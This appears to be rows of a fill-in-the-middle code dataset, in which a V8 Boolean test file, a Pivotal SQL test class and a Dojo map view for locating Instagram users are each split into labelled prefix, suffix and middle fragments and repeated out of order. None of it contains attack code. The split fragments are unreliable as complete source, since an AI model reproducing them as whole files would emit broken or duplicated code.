// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
assertEquals(Boolean(void 0), false);
assertEquals(Boolean(null), false);
assertEquals(Boolean(false), false);
assertEquals(Boolean(true), true);
assertEquals(Boolean(0), false);
assertEquals(Boolean(1), true);
assertEquals(Boolean(assertEquals), true);
assertEquals(Boolean(new Object()), true);
assertTrue(new Boolean(false) !== false);
assertTrue(new Boolean(false) == false);
assertTrue(new Boolean(true) !== true);
assertTrue(new Boolean(true) == true);
assertEquals(true, !false);
assertEquals(false, !true);
assertEquals(true, !!true);
assertEquals(false, !!false);
assertEquals(true, true ? true : false);
assertEquals(false, false ? true : false);
assertEquals(false, true ? false : true);
assertEquals(true, false ? false : true);
assertEquals(true, true && true);
assertEquals(false, true && false);
assertEquals(false, false && true);
assertEquals(false, false && false);
// Regression.
var t = 42;
assertEquals(void 0, t.p);
assertEquals(void 0, t.p && true);
assertEquals(void 0, t.p && false);
assertEquals(void 0, t.p && (t.p == 0));
assertEquals(void 0, t.p && (t.p == null));
assertEquals(void 0, t.p && (t.p == t.p));
var o = new Object();
o.p = 'foo';
assertEquals('foo', o.p);
assertEquals('foo', o.p || true);
assertEquals('foo', o.p || false);
assertEquals('foo', o.p || (o.p == 0));
assertEquals('foo', o.p || (o.p == null));
assertEquals('foo', o.p || (o.p == o.p));
// JSToBoolean(x:string)
function f(x) |
assertEquals(false, f(""));
assertEquals(true, f("narf"));
assertEquals(true, f(12345678));
assertEquals(true, f(undefined));
| { return !!("" + x); } | identifier_body |
boolean.js | // Copyright 2011 the V8 project authors. All rights reserved.
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
assertEquals(Boolean(void 0), false);
assertEquals(Boolean(null), false);
assertEquals(Boolean(false), false);
assertEquals(Boolean(true), true);
assertEquals(Boolean(0), false);
assertEquals(Boolean(1), true);
assertEquals(Boolean(assertEquals), true);
assertEquals(Boolean(new Object()), true);
assertTrue(new Boolean(false) !== false);
assertTrue(new Boolean(false) == false);
assertTrue(new Boolean(true) !== true);
assertTrue(new Boolean(true) == true);
assertEquals(true, !false);
assertEquals(false, !true);
assertEquals(true, !!true);
assertEquals(false, !!false);
assertEquals(true, true ? true : false);
assertEquals(false, false ? true : false);
assertEquals(false, true ? false : true);
assertEquals(true, false ? false : true);
assertEquals(true, true && true);
assertEquals(false, true && false);
assertEquals(false, false && true);
assertEquals(false, false && false);
// Regression.
var t = 42;
assertEquals(void 0, t.p);
assertEquals(void 0, t.p && true);
assertEquals(void 0, t.p && false);
assertEquals(void 0, t.p && (t.p == 0));
assertEquals(void 0, t.p && (t.p == null));
assertEquals(void 0, t.p && (t.p == t.p));
var o = new Object();
o.p = 'foo';
assertEquals('foo', o.p);
assertEquals('foo', o.p || true);
assertEquals('foo', o.p || false);
assertEquals('foo', o.p || (o.p == 0));
assertEquals('foo', o.p || (o.p == null));
assertEquals('foo', o.p || (o.p == o.p));
// JSToBoolean(x:string)
function | (x) { return !!("" + x); }
assertEquals(false, f(""));
assertEquals(true, f("narf"));
assertEquals(true, f(12345678));
assertEquals(true, f(undefined));
| f | identifier_name |
boolean.js | // Copyright 2011 the V8 project authors. All rights reserved. | //
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
assertEquals(Boolean(void 0), false);
assertEquals(Boolean(null), false);
assertEquals(Boolean(false), false);
assertEquals(Boolean(true), true);
assertEquals(Boolean(0), false);
assertEquals(Boolean(1), true);
assertEquals(Boolean(assertEquals), true);
assertEquals(Boolean(new Object()), true);
assertTrue(new Boolean(false) !== false);
assertTrue(new Boolean(false) == false);
assertTrue(new Boolean(true) !== true);
assertTrue(new Boolean(true) == true);
assertEquals(true, !false);
assertEquals(false, !true);
assertEquals(true, !!true);
assertEquals(false, !!false);
assertEquals(true, true ? true : false);
assertEquals(false, false ? true : false);
assertEquals(false, true ? false : true);
assertEquals(true, false ? false : true);
assertEquals(true, true && true);
assertEquals(false, true && false);
assertEquals(false, false && true);
assertEquals(false, false && false);
// Regression.
var t = 42;
assertEquals(void 0, t.p);
assertEquals(void 0, t.p && true);
assertEquals(void 0, t.p && false);
assertEquals(void 0, t.p && (t.p == 0));
assertEquals(void 0, t.p && (t.p == null));
assertEquals(void 0, t.p && (t.p == t.p));
var o = new Object();
o.p = 'foo';
assertEquals('foo', o.p);
assertEquals('foo', o.p || true);
assertEquals('foo', o.p || false);
assertEquals('foo', o.p || (o.p == 0));
assertEquals('foo', o.p || (o.p == null));
assertEquals('foo', o.p || (o.p == o.p));
// JSToBoolean(x:string)
function f(x) { return !!("" + x); }
assertEquals(false, f(""));
assertEquals(true, f("narf"));
assertEquals(true, f(12345678));
assertEquals(true, f(undefined)); | // Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met: | random_line_split |
test_triggersqls.py | """
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models import SQLTestCase
'''
Trigger sqls for create_tests
'''
class TestTriggerSQLClass(SQLTestCase):
'''
This class contains all the sqls that are part of the trigger phase
The sqls in here will get suspended by one of the faults that are triggered in the main run
@gpdiff False
'''
sql_dir = 'sql/'
@classmethod
def setUpClass(cls):
| """
Since some operation in this scenario is blocked, we want to run
only aimed SQLs without unexpected setup. Just make this no-op.
"""
pass | identifier_body |
|
test_triggersqls.py | """
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models import SQLTestCase
'''
Trigger sqls for create_tests
'''
class TestTriggerSQLClass(SQLTestCase):
'''
This class contains all the sqls that are part of the trigger phase
The sqls in here will get suspended by one of the faults that are triggered in the main run
@gpdiff False
'''
sql_dir = 'sql/'
@classmethod
def | (cls):
"""
Since some operation in this scenario is blocked, we want to run
only aimed SQLs without unexpected setup. Just make this no-op.
"""
pass
| setUpClass | identifier_name |
test_triggersqls.py | """
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models import SQLTestCase
'''
Trigger sqls for create_tests | class TestTriggerSQLClass(SQLTestCase):
'''
This class contains all the sqls that are part of the trigger phase
The sqls in here will get suspended by one of the faults that are triggered in the main run
@gpdiff False
'''
sql_dir = 'sql/'
@classmethod
def setUpClass(cls):
"""
Since some operation in this scenario is blocked, we want to run
only aimed SQLs without unexpected setup. Just make this no-op.
"""
pass | ''' | random_line_split |
MainView.js | /****************************************************************************
** Acilos app: https://github.com/omnibond/acilos
** Copyright (C) 2014 Omnibond Systems LLC. and/or its subsidiary(-ies).
** All rights reserved.
** Omnibond Systems - www.omnibond.com for Acilos.com
**
** This file defines the mainView for the locateMe module
** This is DEPRECATED
**
** $QT_BEGIN_LICENSE:LGPL$
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
**
** If you have questions regarding the use of this file, please contact
** Omnibond Systems - www.omnibond.com
**
** $QT_END_LICENSE$
*/
define(['dojo/_base/declare',
'dojo-mama/views/ModuleScrollableView',
'dojo/dom-construct',
'dojo/topic',
"dojo/_base/lang",
'dojo/on',
'dojo/dom-geometry',
'app/util/xhrManager',
'app/TitleBar',
"app/SelRoundRectList",
"dojox/mobile/Button",
"dojox/mobile/ListItem",
"dojox/mobile/ToolBarButton",
"dojox/mobile/EdgeToEdgeCategory",
"dojox/mobile/Heading",
"dojox/mobile/TextBox"
], function(
declare,
ModuleScrollableView,
domConstruct,
topic,
lang,
on,
domGeom,
xhrManager,
TitleBar,
RoundRectList,
Button,
ListItem,
ToolBarButton,
EdgeToEdgeCategory,
Heading,
TextBox
) {
return declare([ModuleScrollableView], {
buildMap: function(){
this.holder = domConstruct.create('div', {style:"width:500px;height:500px;margin-left:10px;margin-top:10px"}); //Was originally 200px by 200px
this.domNode.appendChild(this.holder);
this.mapDiv = domConstruct.create('div', {id:"map-canvas", style:"width:100%;height:100%"});
this.holder.appendChild(this.mapDiv);
},
buildList: function(){
this.mainList = new RoundRectList({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.instaListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.locationListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.buildInstagramAroundMeButton();
this.buildLocationBox();
this.mainList.addChild(this.instaListItem);
this.mainList.addChild(this.locationListItem);
this.instaListItem.addChild(this.instaAroundButton);
this.locationListItem.addChild(this.locationBox);
this.addChild(this.mainList);
},
buildInstagramAroundMeButton: function(){
this.instaAroundButton = new ToolBarButton({
label: "Show Instagram users in area",
style: "margin-left:10px;margin-top:10px",
clickable: true,
onClick: lang.hitch(this, function(){
console.log("CLICK");
if(this.locationBox.get("value") == ""){
this.item.set("rightText", "You must enter a location");
}else{
var loc = this.locationBox.get("value");
var location = loc.replace(" ", "+");
//anything that gets put after the function in lang.hitch moves all args down one and puts itself at the begining.
//so now obj will be the SECOND param and "Foursquare" will be the first
this.getAroundMe("InstagramLocal", location).then(lang.hitch(this, this.populate, "InstagramLocal"));
}
})
})
},
buildLocationBox: function(){
this.locationBox = new TextBox({
placeHolder: "Enter a location",
style: "margin-left:9px"
})
},
populate: function(call, obj){
for(var f = 0; f < obj.length; f++){
if(call == "InstagramLocal"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['user']['username']);
}else if(call == "Foursquare"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['name']);
}
}
},
addMarkerWithClick: function(marker, name){
var markerArray = [];
var image = {
url: 'app/locateUsers/google_earth.png',
// This marker is 256 pixels wide by 256 pixels tall.
size: new google.maps.Size(24, 24),
// The origin for this image is 0,0.
origin: new google.maps.Point(0,0),
// The anchor for this image is the base of the flagpole at 0,32.
anchor: new google.maps.Point(12, 12)
};
var shape = {
coord: [1, 1, 1, 20, 18, 20, 18 , 1],
type: 'poly'
};
var arr = marker.split("#");
var latlng = new google.maps.LatLng(arr[0], arr[1]);
var marker = new google.maps.Marker({
position: latlng,
title: name,
//draggable: true,
icon: image,
animation: google.maps.Animation.DROP
})
google.maps.event.addListener(marker, 'click', toggleBounce, function(event){
console.log("clicked", name);
});
markerArray.push(marker);
marker.setMap(this.map);
function toggleBounce() |
},
initialize: function() {
var latlng = new google.maps.LatLng(39, -106);
var mapOptions = {
zoom: 3,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
}
this.map = new google.maps.Map(this.mapDiv, mapOptions);
//google.maps.event.trigger(this.map, "resize");
},
postCreate: function(){
if(this.mainList){
this.mainList.destroyRecursive();
this.mainList = null;
this.buildList();
}else{
this.buildList();
}
this.buildMap();
this.initialize();
},
activate: function(e){
topic.publish("/dojo-mama/updateSubNav", {back: '/analytics', title: "User Locations"} );
}
})
}); | {
if(marker.getAnimation() != null){
marker.setAnimation(null);
}else{
marker.setAnimation(google.maps.Animation.BOUNCE);
}
} | identifier_body |
MainView.js | /****************************************************************************
** Acilos app: https://github.com/omnibond/acilos
** Copyright (C) 2014 Omnibond Systems LLC. and/or its subsidiary(-ies).
** All rights reserved.
** Omnibond Systems - www.omnibond.com for Acilos.com
**
** This file defines the mainView for the locateMe module
** This is DEPRECATED
**
** $QT_BEGIN_LICENSE:LGPL$
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
**
** If you have questions regarding the use of this file, please contact
** Omnibond Systems - www.omnibond.com
**
** $QT_END_LICENSE$
*/
define(['dojo/_base/declare',
'dojo-mama/views/ModuleScrollableView',
'dojo/dom-construct',
'dojo/topic',
"dojo/_base/lang",
'dojo/on',
'dojo/dom-geometry',
'app/util/xhrManager',
'app/TitleBar',
"app/SelRoundRectList",
"dojox/mobile/Button",
"dojox/mobile/ListItem",
"dojox/mobile/ToolBarButton",
"dojox/mobile/EdgeToEdgeCategory",
"dojox/mobile/Heading",
"dojox/mobile/TextBox"
], function(
declare,
ModuleScrollableView,
domConstruct,
topic,
lang,
on,
domGeom,
xhrManager,
TitleBar,
RoundRectList,
Button,
ListItem,
ToolBarButton,
EdgeToEdgeCategory,
Heading,
TextBox
) {
return declare([ModuleScrollableView], {
buildMap: function(){
this.holder = domConstruct.create('div', {style:"width:500px;height:500px;margin-left:10px;margin-top:10px"}); //Was originally 200px by 200px
this.domNode.appendChild(this.holder);
this.mapDiv = domConstruct.create('div', {id:"map-canvas", style:"width:100%;height:100%"});
this.holder.appendChild(this.mapDiv);
},
buildList: function(){
this.mainList = new RoundRectList({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.instaListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.locationListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.buildInstagramAroundMeButton();
this.buildLocationBox();
this.mainList.addChild(this.instaListItem);
this.mainList.addChild(this.locationListItem);
this.instaListItem.addChild(this.instaAroundButton);
this.locationListItem.addChild(this.locationBox);
this.addChild(this.mainList);
},
buildInstagramAroundMeButton: function(){
this.instaAroundButton = new ToolBarButton({
label: "Show Instagram users in area",
style: "margin-left:10px;margin-top:10px",
clickable: true,
onClick: lang.hitch(this, function(){
console.log("CLICK");
if(this.locationBox.get("value") == ""){
this.item.set("rightText", "You must enter a location");
}else{
var loc = this.locationBox.get("value");
var location = loc.replace(" ", "+");
//anything that gets put after the function in lang.hitch moves all args down one and puts itself at the begining.
//so now obj will be the SECOND param and "Foursquare" will be the first
this.getAroundMe("InstagramLocal", location).then(lang.hitch(this, this.populate, "InstagramLocal"));
}
})
})
},
buildLocationBox: function(){
this.locationBox = new TextBox({
placeHolder: "Enter a location",
style: "margin-left:9px"
})
},
populate: function(call, obj){
for(var f = 0; f < obj.length; f++){
if(call == "InstagramLocal"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['user']['username']);
}else if(call == "Foursquare"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['name']);
}
}
},
addMarkerWithClick: function(marker, name){
var markerArray = [];
var image = {
url: 'app/locateUsers/google_earth.png',
// This marker is 256 pixels wide by 256 pixels tall.
size: new google.maps.Size(24, 24),
// The origin for this image is 0,0.
origin: new google.maps.Point(0,0),
// The anchor for this image is the base of the flagpole at 0,32.
anchor: new google.maps.Point(12, 12)
};
var shape = {
coord: [1, 1, 1, 20, 18, 20, 18 , 1],
type: 'poly'
};
var arr = marker.split("#");
var latlng = new google.maps.LatLng(arr[0], arr[1]);
var marker = new google.maps.Marker({
position: latlng,
title: name,
//draggable: true,
icon: image,
animation: google.maps.Animation.DROP
})
google.maps.event.addListener(marker, 'click', toggleBounce, function(event){
console.log("clicked", name);
});
markerArray.push(marker);
marker.setMap(this.map);
function | (){
if(marker.getAnimation() != null){
marker.setAnimation(null);
}else{
marker.setAnimation(google.maps.Animation.BOUNCE);
}
}
},
initialize: function() {
var latlng = new google.maps.LatLng(39, -106);
var mapOptions = {
zoom: 3,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
}
this.map = new google.maps.Map(this.mapDiv, mapOptions);
//google.maps.event.trigger(this.map, "resize");
},
postCreate: function(){
if(this.mainList){
this.mainList.destroyRecursive();
this.mainList = null;
this.buildList();
}else{
this.buildList();
}
this.buildMap();
this.initialize();
},
activate: function(e){
topic.publish("/dojo-mama/updateSubNav", {back: '/analytics', title: "User Locations"} );
}
})
}); | toggleBounce | identifier_name |
MainView.js | /****************************************************************************
** Acilos app: https://github.com/omnibond/acilos
** Copyright (C) 2014 Omnibond Systems LLC. and/or its subsidiary(-ies).
** All rights reserved.
** Omnibond Systems - www.omnibond.com for Acilos.com
**
** This file defines the mainView for the locateMe module
** This is DEPRECATED
**
** $QT_BEGIN_LICENSE:LGPL$
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
**
** If you have questions regarding the use of this file, please contact
** Omnibond Systems - www.omnibond.com
**
** $QT_END_LICENSE$
*/
define(['dojo/_base/declare',
'dojo-mama/views/ModuleScrollableView',
'dojo/dom-construct',
'dojo/topic',
"dojo/_base/lang",
'dojo/on',
'dojo/dom-geometry',
'app/util/xhrManager',
'app/TitleBar',
"app/SelRoundRectList",
"dojox/mobile/Button",
"dojox/mobile/ListItem",
"dojox/mobile/ToolBarButton",
"dojox/mobile/EdgeToEdgeCategory",
"dojox/mobile/Heading",
"dojox/mobile/TextBox"
], function(
declare,
ModuleScrollableView,
domConstruct,
topic,
lang,
on,
domGeom,
xhrManager,
TitleBar,
RoundRectList,
Button,
ListItem,
ToolBarButton,
EdgeToEdgeCategory,
Heading,
TextBox
) {
return declare([ModuleScrollableView], {
buildMap: function(){
this.holder = domConstruct.create('div', {style:"width:500px;height:500px;margin-left:10px;margin-top:10px"}); //Was originally 200px by 200px
this.domNode.appendChild(this.holder);
this.mapDiv = domConstruct.create('div', {id:"map-canvas", style:"width:100%;height:100%"});
this.holder.appendChild(this.mapDiv);
},
buildList: function(){
this.mainList = new RoundRectList({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.instaListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.locationListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.buildInstagramAroundMeButton();
this.buildLocationBox();
this.mainList.addChild(this.instaListItem);
this.mainList.addChild(this.locationListItem);
this.instaListItem.addChild(this.instaAroundButton);
this.locationListItem.addChild(this.locationBox);
this.addChild(this.mainList);
},
buildInstagramAroundMeButton: function(){
this.instaAroundButton = new ToolBarButton({
label: "Show Instagram users in area",
style: "margin-left:10px;margin-top:10px",
clickable: true,
onClick: lang.hitch(this, function(){
console.log("CLICK");
if(this.locationBox.get("value") == "") | else{
var loc = this.locationBox.get("value");
var location = loc.replace(" ", "+");
//anything that gets put after the function in lang.hitch moves all args down one and puts itself at the begining.
//so now obj will be the SECOND param and "Foursquare" will be the first
this.getAroundMe("InstagramLocal", location).then(lang.hitch(this, this.populate, "InstagramLocal"));
}
})
})
},
buildLocationBox: function(){
this.locationBox = new TextBox({
placeHolder: "Enter a location",
style: "margin-left:9px"
})
},
populate: function(call, obj){
for(var f = 0; f < obj.length; f++){
if(call == "InstagramLocal"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['user']['username']);
}else if(call == "Foursquare"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['name']);
}
}
},
addMarkerWithClick: function(marker, name){
var markerArray = [];
var image = {
url: 'app/locateUsers/google_earth.png',
// This marker is 256 pixels wide by 256 pixels tall.
size: new google.maps.Size(24, 24),
// The origin for this image is 0,0.
origin: new google.maps.Point(0,0),
// The anchor for this image is the base of the flagpole at 0,32.
anchor: new google.maps.Point(12, 12)
};
var shape = {
coord: [1, 1, 1, 20, 18, 20, 18 , 1],
type: 'poly'
};
var arr = marker.split("#");
var latlng = new google.maps.LatLng(arr[0], arr[1]);
var marker = new google.maps.Marker({
position: latlng,
title: name,
//draggable: true,
icon: image,
animation: google.maps.Animation.DROP
})
google.maps.event.addListener(marker, 'click', toggleBounce, function(event){
console.log("clicked", name);
});
markerArray.push(marker);
marker.setMap(this.map);
function toggleBounce(){
if(marker.getAnimation() != null){
marker.setAnimation(null);
}else{
marker.setAnimation(google.maps.Animation.BOUNCE);
}
}
},
initialize: function() {
var latlng = new google.maps.LatLng(39, -106);
var mapOptions = {
zoom: 3,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
}
this.map = new google.maps.Map(this.mapDiv, mapOptions);
//google.maps.event.trigger(this.map, "resize");
},
postCreate: function(){
if(this.mainList){
this.mainList.destroyRecursive();
this.mainList = null;
this.buildList();
}else{
this.buildList();
}
this.buildMap();
this.initialize();
},
activate: function(e){
topic.publish("/dojo-mama/updateSubNav", {back: '/analytics', title: "User Locations"} );
}
})
}); | {
this.item.set("rightText", "You must enter a location");
} | conditional_block |
MainView.js | /****************************************************************************
** Acilos app: https://github.com/omnibond/acilos
** Copyright (C) 2014 Omnibond Systems LLC. and/or its subsidiary(-ies).
** All rights reserved.
** Omnibond Systems - www.omnibond.com for Acilos.com
**
** This file defines the mainView for the locateMe module
** This is DEPRECATED
**
** $QT_BEGIN_LICENSE:LGPL$
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
**
** If you have questions regarding the use of this file, please contact
** Omnibond Systems - www.omnibond.com
**
** $QT_END_LICENSE$
*/
define(['dojo/_base/declare',
'dojo-mama/views/ModuleScrollableView',
'dojo/dom-construct',
'dojo/topic',
"dojo/_base/lang",
'dojo/on',
'dojo/dom-geometry',
'app/util/xhrManager',
'app/TitleBar',
"app/SelRoundRectList",
"dojox/mobile/Button",
"dojox/mobile/ListItem",
"dojox/mobile/ToolBarButton",
"dojox/mobile/EdgeToEdgeCategory",
"dojox/mobile/Heading",
"dojox/mobile/TextBox"
], function(
declare,
ModuleScrollableView,
domConstruct,
topic,
lang,
on,
domGeom,
xhrManager,
TitleBar,
RoundRectList,
Button,
ListItem,
ToolBarButton,
EdgeToEdgeCategory,
Heading,
TextBox
) {
return declare([ModuleScrollableView], {
buildMap: function(){
this.holder = domConstruct.create('div', {style:"width:500px;height:500px;margin-left:10px;margin-top:10px"}); //Was originally 200px by 200px
this.domNode.appendChild(this.holder);
this.mapDiv = domConstruct.create('div', {id:"map-canvas", style:"width:100%;height:100%"});
this.holder.appendChild(this.mapDiv);
},
buildList: function(){
this.mainList = new RoundRectList({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.instaListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.locationListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.buildInstagramAroundMeButton();
this.buildLocationBox();
this.mainList.addChild(this.instaListItem);
this.mainList.addChild(this.locationListItem);
this.instaListItem.addChild(this.instaAroundButton);
this.locationListItem.addChild(this.locationBox);
this.addChild(this.mainList);
},
buildInstagramAroundMeButton: function(){
this.instaAroundButton = new ToolBarButton({
label: "Show Instagram users in area",
style: "margin-left:10px;margin-top:10px",
clickable: true,
onClick: lang.hitch(this, function(){
console.log("CLICK");
if(this.locationBox.get("value") == ""){
this.item.set("rightText", "You must enter a location");
}else{
var loc = this.locationBox.get("value");
var location = loc.replace(" ", "+");
//anything that gets put after the function in lang.hitch moves all args down one and puts itself at the begining.
//so now obj will be the SECOND param and "Foursquare" will be the first
this.getAroundMe("InstagramLocal", location).then(lang.hitch(this, this.populate, "InstagramLocal"));
}
}) | buildLocationBox: function(){
this.locationBox = new TextBox({
placeHolder: "Enter a location",
style: "margin-left:9px"
})
},
populate: function(call, obj){
for(var f = 0; f < obj.length; f++){
if(call == "InstagramLocal"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['user']['username']);
}else if(call == "Foursquare"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['name']);
}
}
},
addMarkerWithClick: function(marker, name){
var markerArray = [];
var image = {
url: 'app/locateUsers/google_earth.png',
// This marker is 256 pixels wide by 256 pixels tall.
size: new google.maps.Size(24, 24),
// The origin for this image is 0,0.
origin: new google.maps.Point(0,0),
// The anchor for this image is the base of the flagpole at 0,32.
anchor: new google.maps.Point(12, 12)
};
var shape = {
coord: [1, 1, 1, 20, 18, 20, 18 , 1],
type: 'poly'
};
var arr = marker.split("#");
var latlng = new google.maps.LatLng(arr[0], arr[1]);
var marker = new google.maps.Marker({
position: latlng,
title: name,
//draggable: true,
icon: image,
animation: google.maps.Animation.DROP
})
google.maps.event.addListener(marker, 'click', toggleBounce, function(event){
console.log("clicked", name);
});
markerArray.push(marker);
marker.setMap(this.map);
function toggleBounce(){
if(marker.getAnimation() != null){
marker.setAnimation(null);
}else{
marker.setAnimation(google.maps.Animation.BOUNCE);
}
}
},
initialize: function() {
var latlng = new google.maps.LatLng(39, -106);
var mapOptions = {
zoom: 3,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
}
this.map = new google.maps.Map(this.mapDiv, mapOptions);
//google.maps.event.trigger(this.map, "resize");
},
postCreate: function(){
if(this.mainList){
this.mainList.destroyRecursive();
this.mainList = null;
this.buildList();
}else{
this.buildList();
}
this.buildMap();
